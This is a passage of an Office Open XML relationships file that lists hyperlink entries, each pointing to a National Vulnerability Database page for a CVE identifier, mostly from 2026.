Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87610" TargetMode="External" Id="rId4125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87620" TargetMode="External" Id="rId4126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87623" TargetMode="External" Id="rId4127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87626" TargetMode="External" Id="rId4128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87629" TargetMode="External" Id="rId4129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87631" TargetMode="External" Id="rId4130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87724" TargetMode="External" Id="rId4131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88000" TargetMode="External" Id="rId4132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88002" TargetMode="External" Id="rId4133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88005" TargetMode="External" Id="rId4134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88006" TargetMode="External" Id="rId4135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88268" TargetMode="External" Id="rId4136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88269" TargetMode="External" Id="rId4137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88270" TargetMode="External" Id="rId4138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88288" TargetMode="External" Id="rId4139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88770" TargetMode="External" Id="rId4140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89089" TargetMode="External" Id="rId4141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89158" TargetMode="External" Id="rId4142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9138" TargetMode="External" Id="rId4143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9186" TargetMode="External" Id="rId4144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9225" TargetMode="External" Id="rId4145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9336" TargetMode="External" Id="rId4146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9745" TargetMode="External" Id="rId4147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-57847" TargetMode="External" Id="rId4148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-7195" TargetMode="External" Id="rId4149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12230" TargetMode="External" Id="rId4150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13709" TargetMode="External" Id="rId4151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15796" TargetMode="External" Id="rId4152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15820" TargetMode="External" Id="rId4153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15889" TargetMode="External" Id="rId4154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17149" TargetMode="External" Id="rId4155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18404" TargetMode="External" Id="rId4156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19634" TargetMode="External" Id="rId4157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19945" TargetMode="External" Id="rId4158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2390" TargetMode="External" Id="rId4159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33388" TargetMode="External" Id="rId4160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3853" TargetMode="External" Id="rId4161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45573" TargetMode="External" Id="rId4162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4657" TargetMode="External" Id="rId4163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47699" TargetMode="External" Id="rId4164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50720" TargetMode="External" Id="rId4165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5399" TargetMode="External" Id="rId4166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54743" TargetMode="External" Id="rId4167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54746" TargetMode="External" Id="rId4168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62861" TargetMode="External" Id="rId4169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6640" TargetMode="External" Id="rId4170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6641" TargetMode="External" Id="rId4171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6642" TargetMode="External" Id="rId4172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66760" TargetMode="External" Id="rId4173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69878" TargetMode="External" Id="rId4174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70582" TargetMode="External" Id="rId4175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71311" TargetMode="External" Id="rId4176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71338" TargetMode="External" Id="rId4177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72720" TargetMode="External" Id="rId4178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72881" TargetMode="External" Id="rId4179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72947" TargetMode="External" Id="rId4180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7438" TargetMode="External" Id="rId4181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75966" TargetMode="External" Id="rId4182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76573" TargetMode="External" Id="rId4183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76931" TargetMode="External" Id="rId4184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77186" TargetMode="External" Id="rId4185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77187" TargetMode="External" Id="rId4186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId4187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId4188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79974" TargetMode="External" Id="rId4189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82081" TargetMode="External" Id="rId4190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83534" TargetMode="External" Id="rId4191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85414" TargetMode="External" Id="rId4192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8623" TargetMode="External" Id="rId4193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8625" TargetMode="External" Id="rId4194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87870" TargetMode="External" Id="rId4195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-62718" TargetMode="External" Id="rId4196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13148" TargetMode="External" Id="rId4197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18121" TargetMode="External" Id="rId4198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19683" TargetMode="External" Id="rId4199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25552" TargetMode="External" Id="rId4200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39828" TargetMode="External" Id="rId4201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43980" TargetMode="External" Id="rId4202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44476" TargetMode="External" Id="rId4203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47721" TargetMode="External" Id="rId4204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48115" TargetMode="External" Id="rId4205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50544" TargetMode="External" Id="rId4206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53600" TargetMode="External" Id="rId4207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53639" TargetMode="External" Id="rId4208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54020" TargetMode="External" Id="rId4209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55162" TargetMode="External" Id="rId4210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55163" TargetMode="External" Id="rId4211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55482" TargetMode="External" Id="rId4212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5588" TargetMode="External" Id="rId4213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57165" TargetMode="External" Id="rId4214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57166" TargetMode="External" Id="rId4215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61807" TargetMode="External" Id="rId4216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6217" TargetMode="External" Id="rId4217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62323" TargetMode="External" Id="rId4218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62670" TargetMode="External" Id="rId4219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63187" TargetMode="External" Id="rId4220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63335" TargetMode="External" Id="rId4221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63379" TargetMode="External" Id="rId4222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63642" TargetMode="External" Id="rId4223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63643" TargetMode="External" Id="rId4224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67278" TargetMode="External" Id="rId4225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69243" TargetMode="External" Id="rId4226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70490" TargetMode="External" Id="rId4227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70597" TargetMode="External" Id="rId4228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70667" TargetMode="External" Id="rId4229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71557" TargetMode="External" Id="rId4230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72728" TargetMode="External" Id="rId4231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72916" TargetMode="External" Id="rId4232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73411" TargetMode="External" Id="rId4233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73412" TargetMode="External" Id="rId4234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73530" TargetMode="External" Id="rId4235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73557" TargetMode="External" Id="rId4236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73829" TargetMode="External" Id="rId4237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75168" TargetMode="External" Id="rId4238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77697" TargetMode="External" Id="rId4239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79973" TargetMode="External" Id="rId4240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81788" TargetMode="External" Id="rId4241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81824" TargetMode="External" Id="rId4242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81904" TargetMode="External" Id="rId4243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81905" TargetMode="External" Id="rId4244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81906" TargetMode="External" Id="rId4245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81994" TargetMode="External" Id="rId4246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81997" TargetMode="External" Id="rId4247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82729" TargetMode="External" Id="rId4248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82754" TargetMode="External" Id="rId4249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82755" TargetMode="External" Id="rId4250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82756" TargetMode="External" Id="rId4251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82757" TargetMode="External" Id="rId4252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82758" TargetMode="External" Id="rId4253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83610" TargetMode="External" Id="rId4254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84303" TargetMode="External" Id="rId4255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84308" TargetMode="External" Id="rId4256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84376" TargetMode="External" Id="rId4257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84942" TargetMode="External" Id="rId4258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84969" TargetMode="External" Id="rId4259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85084" TargetMode="External" Id="rId4260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85167" TargetMode="External" Id="rId4261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85592" TargetMode="External" Id="rId4262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85640" TargetMode="External" Id="rId4263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86077" TargetMode="External" Id="rId4264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86079" TargetMode="External" Id="rId4265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86080" TargetMode="External" Id="rId4266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86186" TargetMode="External" Id="rId4267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86203" TargetMode="External" Id="rId4268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86420" TargetMode="External" Id="rId4269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86421" TargetMode="External" Id="rId4270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86590" TargetMode="External" Id="rId4271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87047" TargetMode="External" Id="rId4272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88014" TargetMode="External" Id="rId4273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88859" TargetMode="External" Id="rId4274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9327" TargetMode="External" Id="rId4275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18874" TargetMode="External" Id="rId4276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19795" TargetMode="External" Id="rId4277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41987" TargetMode="External" Id="rId4278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44846" TargetMode="External" Id="rId4279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49311" TargetMode="External" Id="rId4280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52295" TargetMode="External" Id="rId4281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53937" TargetMode="External" Id="rId4282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54785" TargetMode="External" Id="rId4283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55373" TargetMode="External" Id="rId4284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68499" TargetMode="External" Id="rId4285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71429" TargetMode="External" Id="rId4286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71430" TargetMode="External" Id="rId4287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71832" TargetMode="External" Id="rId4288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81859" 